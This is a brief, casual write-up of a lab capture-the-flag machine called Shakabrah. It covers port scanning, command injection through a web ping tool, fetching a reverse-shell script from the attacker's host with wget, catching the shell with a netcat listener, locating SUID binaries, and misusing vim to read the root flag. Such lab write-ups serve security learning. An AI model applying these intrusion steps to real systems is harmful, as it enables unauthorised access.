Hey,
Here’s a quick summarization of the virtual target called Shakabrah on Proving Grounds.
If you’re new, apply for an account, get the openvpn pack, run it with #openvpn universal.ovpn and you’ll be connected via VPN to the target box.
It’s a great little environment for learning about this subject.
Anyhow, here’s my summary:
1. nmap to find tcp 22/80 open
2. Browse to 80, see a pinger app, ripe for abuse. Can do most linux commands like wget, ls, pwd etc. CAN write to /tmp so wget me/revshell.sh but I ended up not needing that.
3. A python3 command caused it to dial back to me on 80 but refused on 4444. (Had to disable nginx locally on 80 to let nc -nvlp 80 use the port.
5. Anyhow, got unpriv shell, then found suid bit binaries with
$find / -perm -u=s -type f 2>/dev/null and found vim.basic. Headed to revshells.com.
6. Saw vim.basic but their string never worked and I simply guessed $vim /root/proof.txt (Total guess) to elicit the hash for the 2nd flag.
Didn’t even need to get root lol. score!
Gerg